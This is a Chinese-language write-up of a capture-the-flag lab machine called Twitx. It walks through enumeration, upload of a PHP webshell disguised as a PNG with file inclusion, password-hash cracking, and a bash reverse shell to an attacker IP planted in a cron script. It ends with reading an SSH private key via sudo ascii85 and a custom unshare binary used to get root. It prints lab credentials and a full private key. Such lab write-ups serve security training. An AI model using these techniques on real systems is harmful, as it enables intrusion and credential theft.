# 靶场搭建

下载:Twitx

Nat,IP: 192.168.1.128

# 渗透过程

# 信息初收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 bc:cd:ce:6e:98:09:e5:60:d2:f3:96:74:eb:3f:cc:e3 (ECDSA)
|_  256 b0:38:0c:1c:76:d0:de:64:0a:c4:07:89:4b:71:69:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.59 (Debian)
http://192.168.1.128/info.php
http://192.168.1.128/note
Recuerda contratar certificado del dominio twitx.nyx para el lanzamiento.
记得为 twitx.nyx 的发布购买域名证书。

添加域名到 host

┌──(root㉿kali)-[~/Desktop]
└─# gobuster dir -u http://twitx.nyx/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://twitx.nyx/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 274]
/index.php            (Status: 200) [Size: 33241]
/user                 (Status: 301) [Size: 305] [--> http://twitx.nyx/user/]
/.html                (Status: 403) [Size: 274]
/assets               (Status: 301) [Size: 307] [--> http://twitx.nyx/assets/]                                                                            
/upload               (Status: 301) [Size: 307] [--> http://twitx.nyx/upload/]                                                                            
/css                  (Status: 301) [Size: 304] [--> http://twitx.nyx/css/]
/includes             (Status: 301) [Size: 309] [--> http://twitx.nyx/includes/]                                                                          
/js                   (Status: 301) [Size: 303] [--> http://twitx.nyx/js/]
/private.php          (Status: 302) [Size: 0] [--> /?error=Zona+privada#registrate]                                                                       
/javascript           (Status: 301) [Size: 311] [--> http://twitx.nyx/javascript/]                                                                        
/.php                 (Status: 403) [Size: 274]
/.html                (Status: 403) [Size: 274]
/server-status        (Status: 403) [Size: 274]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

进入 http://twitx.nyx/private.php ,是个注册表单,有个文件上传。

查看源代码发现第 527 行有提示,URL 解码后如下

<form method="post" action="?i">
<div class="mb-4 row">
  <div class="form-floating mb-3">
      <input class="form-control" id="email" type="email" name="email"
          required="required" />
      <label for="email">Email </label>
  </div>
  <!-- Password number input-->
  <div class="form-floating mb-3">
      <input class="form-control" id="password" type="password" name="password"
          required="required" />
      <label for="password">Contrase�a</label>
  </div>
  </div>
  <button class="btn btn-secondary me-5">
      <i class="fa-solid fa-right-to-bracket me-2"></i>Log-in
  </button>
  <button class="btn btn-primary" type="button" data-bs-dismiss="modal">
      <i class="fas fa-xmark fa-fw"></i>
      Cerrar
  </button>
</form>

发现了登录表单,我们先注册一个账号,然后直接发送一下登录请求

┌──(root㉿kali)-[~]
└─# curl -i -X POST --data 'email=123%40123.com&password=12345678' 'http://twitx.nyx/?i' 
HTTP/1.1 302 Found
Date: Fri, 07 Jun 2024 21:42:49 GMT
Server: Apache/2.4.59 (Debian)
Set-Cookie: PHPSESSID=cncdd6f7nb5efvcqlfipknm9bd; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ?success=Usuario+validado+correctamente.#registrate
Set-Cookie: PHPSESSID=cei810vp09qe21mes697253uum; path=/
Content-Length: 0
Content-Type: text/html; charset=UTF-8

达到登录后的地址和 PHPSESSID,我们直接改一手,然后刷新一下发现登录成功

看到前面上传的图片地址了,但是前面只能上传 png 图片

注册的时候上传,登陆过去查看地址,直接访问是不能解析的,但是观察到 profile 页面和前面扫描的目录,可以发现是有 user 目录的

访问一下 http://twitx.nyx/user/profile.php 发现确实如此,那么我们可以拼接一下,把图片包含进来

注册的时候,上传一个 png 后缀的 php 马。通过前面的 curl 获取登录后的 sessionID,前端修改后进入 profile,查看 png 的路径

组合一下,访问触发: http://twitx.nyx/private.php?folder=upload&file=152124645266638af1e4b0d9.39084780.png

拿到 shell

# 提权

网站目录下 /var/www/twitx.nyx/includes/config.php 中存了账户信息

$dbHost = 'localhost';
$dbUser = 'twitxdbusr';
$dbPassword = '3GcxHeSqbgf1kfj';
$dbDatabase = 'twitxdb';

进数据库看看

www-data@twitx:/var/www/twitx.nyx/includes$ mysql -u twitxdbusr -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 39
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| twitxdb            |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use twitxdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [twitxdb]> show tables;
+-------------------+
| Tables_in_twitxdb |
+-------------------+
| users             |
+-------------------+
1 row in set (0.000 sec)
MariaDB [twitxdb]> select * from users;
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+                                                           
| id | nombre | email                    | password                                                     | avatar                                | role |                                                           
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+                                                           
|  1 | Lenam  | [email protected] | $2y$10$OZh9Cqq7PupktlS/LbtJu.c4bFXWUaTW3zAbmS1litThpCfMAurtm |                                       | adm  |                                                           
|  2 | 123    | 123@123.com              | $2y$10$nM/m5idaaJoGXk.12HhFDeQdu2fYbMNaN9sFyCWAyycFIzX7RA1ne | 30710014266637852db6459.26073065.png  | usr  |                                                           
|  3 | 2222   | 2222@222.com             | $2y$10$1mO34Ve6b76E2Biqalg/..cwfTKn.8cHuMywnKcxpw5E2oiKNzkGS | 1320458475666380f4701ff3.05570504.png | usr  |                                                           
|  4 | 111    | 111@111.com              | $2y$10$kH5/MHOtMH25pgXZU6QvoOBJBuNJe0iC7AEEE7fFHix9KidQXAtNe | 16238279576663888a01e193.62033086.png | usr  |                                                           
|  5 | 1111   | 1111@1111.com            | $2y$10$hFHKmlMguBsQUDhiHL9/Y.7PYbdgoOHkeAql98mCfo.IQlLcS.ZEC | 152124645266638af1e4b0d9.39084780.png | usr  |                                                           
|  6 | 666    | 666@666.com              | $2y$10$KNh0gBRRw7MDLPNliUxmoupnwka8pWmUmZNFf4MSw6uXgySGBt8Ti | 128460101166638d442c1e62.12431542.png | usr  |                                                           
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+                                                           
6 rows in set (0.000 sec)

解一下第一条密码

先去:hashes.com,查一下加密算法,是 bcrypt

┌──(root㉿kali)-[~]
└─# echo '$2y$10$OZh9Cqq7PupktlS/LbtJu.c4bFXWUaTW3zAbmS1litThpCfMAurtm' > hash
                                                                                                        
┌──(root㉿kali)-[~]
└─# john hash --wordlist /usr/share/wordlists/rockyou.txt --format=bcrypt   
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
patricia         (?)     
1g 0:00:00:10 DONE (2024-06-07 11:06) 0.09842g/s 99.21p/s 99.21c/s 99.21C/s molly1..petey
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到了密码: patricia

su 不过去只能想其他办法了

上传 pspy 监听,发现有计划任务, /var/www/twitx.nyx/includes/taak.php 。写反弹 shell 进去: system("bash -c'bash-i >&/dev/tcp/192.168.1.129/6666 0>&1'");

拿到 timer 的 shell

timer@twitx:~$ sudo ascii85 "/home/lenam/.ssh/id_rsa" | ascii85 --decode
-----BEGIN OPENSSH PRIVATE KEY-----
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
4lWiSQ==
-----END OPENSSH PRIVATE KEY-----

拿到 lenam 的 ssh 私钥,ssh 登录上去,passphrase 是前面得到的 patricia

看到用户目录里面有个 look\inside 文件夹,里面有个可执行文件 unshare

运行一下 ./unshare -h 发现好像能提供一个 uid,然后使用这个 uid 进入目录

果断改成 0: ./unshare -S 0

拿到了 root shell